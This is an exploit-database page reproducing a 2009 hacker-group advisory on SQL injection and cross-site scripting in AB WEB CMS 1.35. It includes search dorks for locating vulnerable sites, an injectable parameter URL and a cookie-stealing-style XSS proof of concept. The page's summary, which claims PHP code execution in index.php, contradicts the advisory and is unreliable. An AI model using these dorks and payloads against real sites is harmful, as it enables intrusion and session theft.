header-logo
Suggest Exploit
vendor:
AB WEB CMS
by:
Dr.0rYX and Cr3w-DZ
9.3
CVSS
HIGH
Multiple Remote Vulnerabilities
94
CWE
Product Name: AB WEB CMS
Affected Version From: 1.35
Affected Version To: 1.35
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: cpe:a:ab_web_cms:ab_web_cms
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

AB WEB CMS V.1.35 Multiple Remote Vulnerabilities

AB WEB CMS version 1.35 is vulnerable to multiple remote vulnerabilities. The vulnerabilities are caused due to the improper validation of user-supplied input in the 'index.php' script. This can be exploited to execute arbitrary PHP code by sending a specially crafted HTTP request to the vulnerable script.

Mitigation:

Upgrade to the latest version of AB WEB CMS
Source

Exploit-DB raw data:

****************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                      Pr!v8 Expl0iT AND t00L **                   *                                                          

*                                                                                                  *       
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
 
[!]            AB WEB CMS V.1.35 Multiple Remote Vulnerabilities 
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
[!] greet to  :WWW.GAZA-HACKER.NET
              
***************************************************************************/
 

[ Software Information ]
 
[+] Vendor : http://www.aeline-informatique.com/
[+] script   : AB WEB V.1.35 
[+] Download : http://www.aeline-informatique.com/contact.php/ (sell script )
[+] Vulnerability : SQL injection / XSS Vulnerability 
[+] Dork : inurl:"ab_fct.php?fct="
           inurl:" ab_gp_detail.php?id_det="
 
**************************************************************************/
[ Vulnerable File 1]  

    
http://server/[path]/ab_gp_detail.php?id_det=sql[N.A.S.T ]   

[path] : fr , de 

[ Exploit 1 ]  


http://server/fr/ab_gp_detail.php?id_det=  SQL INJECTION   
   
*************************************************************************/  

[ Vulnerable File 2]  

http://server/fr/ab_gp_detail.php?id_det=xss[N.A.S.T ]  

[ Exploit 2 ]  

http://www.server/fr/ab_gp_detail.php?id_det='><script>alert(document.cookie)</script>

[  GReet ]
 
[+] :WWW.Gaza-hacker.net ,WWW.evilzone.org , WWW.sec4ever.com , Exploit-db.com , ALL HACKERS MUSLIMS